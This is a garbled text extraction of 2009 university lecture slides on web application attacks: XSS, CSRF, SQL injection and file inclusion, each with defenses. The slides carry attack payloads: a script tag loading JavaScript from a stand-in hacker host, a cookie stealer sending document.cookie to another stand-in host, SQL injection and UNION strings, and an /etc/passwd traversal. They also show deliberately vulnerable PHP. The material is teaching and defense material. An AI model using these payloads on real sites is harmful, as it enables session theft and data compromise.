Who We Are

bemutefrogtownSecurity

Nov 18, 2013 (3 years and 10 months ago)

75 views

Who We Are Overview
A Atttta ac ck ks s a an nd d M Me etth ho od do ollo og giie es s A Ag ga aiin ns stt
• Andrey Kolmakov • Definitions
W We eb b- -B Ba as se ed d A Ap pp plliic ca attiio on ns s
– umkolmak@cc.umanitoba.ca
• Statistics
• Brian Turchyn
• Attack Information
– brian@dj-bri-t.net
• Demonstration
– http://www.dj-bri-t.net
• Q&A
• Co-op students from University of Manitoba, working
for Manitoba IPC
November 18, 2009
1 2 3
A Few Quick Notes
What are Client-side Attacks?
• Attacks that target vulnerabilities in the client
• Sample code is done in PHP5
application that interacts with a server or service
• Some demonstrations will use DVWA
D De effiin niittiio on ns s
• The application could be a:
– http://www.dvwa.co.uk
– Web browser
• Other demonstrations use customized code
– IM client
– Available online @ http://dj-bri-t.net/projects/
– Email client
– Any system with a UI that connects to a server
• We will be focusing on web applications
– Web GUIs (what you see in your browser)
4 5 6
What are Server-side Attacks? Attack Types What's The Big Deal?
• XSS can cause session hijacks, cookie stealing,
• Complement of Client-side == Server-side •Many different styles of client- and server-side attacks
CSRF, and browser worms.
• Attacks the services, processes running on the server
• Cross-site scripting (XSS) • Eval Injection
• SQL Injection can compromise the entire database
– PHP  CSRF • Setting Manipulation
– Passwords, configuration, administration info, etc
 SQL Injection • Special Element Injection
– MySQL
– Other security systems can be bypassed
 File Inclusion • Account Lockout Attack
– Apache
• Browser sessions can be hijacked, forcing browsers
• Page Hijacking • Full Path Disclosure
– SSH
to visit rogue pages, launching attacks on other web
• Command Injection • Cross-user Defacement
servers
– FTP
• … • …
– ...
7 8 9
1WASC Web Application Security
What's The Big Deal? Statistics
Statistics Project 2008
• Many applications work with web-based frontends
Cross-Site Scripting
– VMWare Server 2
12%
– WebEx
Information Leakage
3%
– Firewall/IDS frontends
4%
SQL Injection
38%
– Webmin (Server Admin OSS)
4%
Insifficient Transport
• Thus, these attacks become more pertinent to check
7% Layer Protection
for, since more and more sensitive data is potentially
Fingerprinting
exposed.
HTTP response
Splitting
32%
Other
10 11 12
http://www.ncircle.com/index.php?s=solution_Web-Application-Vulnerability-Statistics
http://projects.webappsec.org/Web-Application-Security-Statistics
Probability to Detect
Cross-Site Scripting
Vulnerabilities
• Aka XSS
• Subset of HTML Injection
A Atttta ac ck ks s
100%
• Hijack user sessions
90%
80% • Deface websites
Urgent
70%
• Inject hostile content
60% Critical
50% High
• OWASP: http://tinyurl.com/owasp-xss
40% Medium
30%
Low
20%
U+C+H
10%
0%
Scans BlackBox WhiteBox
13 14 15
http://projects.webappsec.org/Web-Application-Security-Statistics
Cross-Site Scripting Cross-Site Scripting Cross-Site Scripting
• Two main types of XSS • Some researchers claim that 68% of all websites are
vulnerable  1. <?php
1. Persistent / Stored
 2. if ( $_POST['SubmitMsg'] ) {
• SEO techniques used to lure victims to sites
2. Non-persistent / Reflected
 3. ... // Add message to database
– Halloween spam uses XSS to force user to
• Persistent is stored in the DBMS to be recalled at a
 4. }
download virus
later time. URLs look harmless until they are loaded.
 5. $q = mysql_query ( ... ) // Get guestbook entries
• Google, Gmail, Yahoo! Mail, Facebook, MySpace,  6. foreach ( $q as $k => $v ) {
• Non-persistent is usually used in the URI or via a
Orkut, MediaWiki - http://xssed.com  7. echo "<b>" . $v["name"] . "</b>: ";
browser hijack w/ Ajax.
 8. echo htmlentities( $v["msg"] ) . "<br />\n";
 9. }
 10. unset ($q, $k, $v);
 11. ?>
16 17 18
2Cross-Site Scripting Cross-Site Scripting Cross-Site Scripting
• The simple test for basic XSS: • Filtering on < and > brackets? • Detection can be performed manually and
– <script>alert(1)</script> automatically.
• No problem!
• Automatic tools include Nikto, Nessus and Acunetix
• A simple alert box pops up – Injecting properties into tags bypasses the carat
bracket filtering process – http://sectools.org/web-scanners.html
– A mild annoyance at best
• echo "<img src='" . $_GET['img'] . "' />\n";
• Manually, you can use a cheat sheet
• But, if you can do this, then you can do a lot more
• Normally, we would expect image.jpg to be there
– http://ha.ckers.org/xss.html
– What's stopping you from importing a .js file?
• What about...
– <script
– image.jpg' onload='alert(document.cookie)
src=http://hack.example.com/virus.js></script>
• Line length considerations
19 20 21
Cross-Site Scripting: Defense Cross-Site Request Forgery Cross-Site Request Forgery
• Escaping/Sanitizing of user input • AKA: • Causes unauthorized commands to be sent by an
attacker to a website through a victim.
• Use a whitelist approach for acceptable characters – Session Riding
• Attacker puts specialized code on a web page
– A good start, but not a complete defense – One-Click Attacks
– Injected
• PHP: html_entities – Cross Site Reference Forgery
– Attacker's site
• JSP: escapeXml="true" – Hostile Linking
• Victim visits compromised page
• ASP: HttpUtility.HtmlEncode – Automation Attack
• Attacker's script is executed
• RoR: h method: <%=h myText %> – XSRF
• OWASP: http://tinyurl.com/owasp-csrf
22 23 24
Cross-Site Request Forgery Cross-Site Request Forgery
• Relies on the lack of a random authenticity token on • URLs through image/iframe tags
– http://example.com/changepass.php?pass=123&cpass=123
the attacked server
• <input type='hidden' name='token'
• XSS
value='1f3870be274f6c49b3e31a0c6728957f'>
– <script src='http://hacker.example.com/attack.js'></script>
• Optionally, if the code is to be executed from another
server, some form of HTML or Javascript injection
usually needs to be present
25 26 27
3Cross-Site Request Forgery:
Cross-Site Request Forgery SQL Injection
Defense
• When a XSRF is possible, there are many attacks
• Addition of a random authenticity token • Injecting SQL queries via input data into the
that can be performed
application.
– PHP: OWASP's CSRF Guard
– Cookie stealer
• Read sensitive data
– JSP: OWASP's CSRF Guard
• <script>document.write("<img
src='http://hackersite.example.com/grabcookie.php?cookie=" + • Modify data
– ASP: Html.AntiForgeryToken()
document.cookie + " ' ")</script>
• Perform administrative functions
– RoR: Built-In
– Browser hijacking
• Grab file contents on the server
• Password verification
• Series of Ajax-based commands to force users
• Write files to server
through a series of pages
• OWASP: http://tinyurl.com/owasp-inject
• The attacker can do anything on that site and make it
appear to be done by you
28 29 30
SQL Injection SQL Injection SQL Injection
• mysql_query("SELECT * FROM users WHERE • mysql_query("SELECT * FROM users WHERE
 <?php
user_name='$user' AND password=md5($password)"); user_name='$user' AND password=md5($password)");
 if ( $_POST['SubmitLogin'] )
• The $user variable is vulnerable to SQL injection • Inserting the string ' or '1'='1 will cause this to pass,
 {
allowing a user to authenticate.
 $user = $_POST['user'];
 $password = $_POST['password']; • This is simple if the attacker knows the underlying
1' or '1'='1
 $sql = mysql_query ( "SELECT * FROM users WHERE database structure, but becomes more difficult when
 user = '$user' AND password = MD5('$password')");
a database structure isn't known.
• mysql_query("SELECT * FROM users WHERE user_name='1'
or '1'='1' AND password=md5($password)");
– We call this "Blind SQL Injection"
 if ( mysql_num_rows ( $sql ) )
 $_SESSION['logged_in'] = true;
 }
 ?>
31 32 33
Blind SQL Injection SQL Injection: Defense SQL Injection
• August 17, 2009 - Heartland Payment Systems, 7-Eleven, Hannaford
• Attacking a database without knowing its underlying • Escape/Filter
– 130 million credit card numbers
structure.
• Many languages provide libraries for automating this
• July 2008 - Kaspersky
• 1' or 1=1 UNION SELECT column_name, 1 FROM
task. – Site hacked by "m0sted" using SQL Injection
information_schema.columns WHERE table_name='users
• April 13, 2008 - Sexual and Violent Offender Registry of Oklahoma
• PHP5 → MySQLi, PDO
– "Routine maintenance" after SSNs of 10,597 offenders had been stolen via
• 1' or 1=1 UNION SELECT column_name, table_name FROM SQL Injection
• Java → PreparedStatement class
information_schema.columns WHERE '1'='1 • June 29, 2007 - Microsoft UK
• C# → SqlCommand class
– Microsoft home page defaced using SQL Injection
• RoR→ Built-in to ActiveRecord::find • PHP-Nuke CMS - Criticized for having multiple SQL Injection flaws
• Automated tools make this attack very powerful
– http://secunia.com/product/2385/?task=advisories
– SQLmap, Absinthe, SQLBrute, SQLiX, bsqlbf
– http://secunia.com/product/13524/?task=advisories
34 35 36
4File Inclusion File Inclusion File Inclusion
 1. <?php
• Forcing a page to include a file which it was otherwise • How are these attacks performed?
 2. // includefile.php
not designed to include
– Typically through GET request  3. $file = $_GET['include'];
 4. include($file);
• Local or Remote, depending on security policy
– Include.php?page=myfile
 5.
• Access to files on filesystem that HTTPd user has  6. // Rest of the page...
– Worse: include.php?page=myfile.php
 7. ?>
read rights to
• No filtering!
• Load an external web page, allowing injection of
– Compression/audio streams: zlib:// and ogg://
• Suicide!
Javascript, etc
• PHP security bypass • includefile.php?include=http://www.google.ca
• OWASP: http://tinyurl.com/owasp-fi
• includefile.php?include=../../../../../../../etc/passwd
– PHP wrappers, ie. php://input
37 38 39
File Inclusion - Example File Inclusion: Defense File Inclusion: Defense
• Severity of this exploit has dropped recently due to • Best prevention method: whitelist
• allow_url_include = Off PHP5 default configuration
– Most secure: array of allowed values
• $file = preg_replace("#(http|https|ftp)://#si", "", $file);
– allow_url_fopen = false by default
– Still pretty good: list of files in an allowed directory
• <?php
$file = $_GET['include']; • Upgrades from PHP4 to PHP5 tend to leave
– Frontend prevention
include( $file . ".php" );
configuration file with the previous settings, so
• Firewall rules
?>
upgrades may still be vulnerable
• Chroot jail
• This setting does not prevent local file inclusion – only
• PHP hardening
remote file inclusion
40 41 42
Resources Resources Demonstration
• http://www.owasp.org
• http://www.sans.org
• Top 10 2010 RC has been
• http://www.webappsec.org
released November 13, 2009
• http://www.ncircle.com
• Latest security threats
• http://xssed.com
43 44 45
5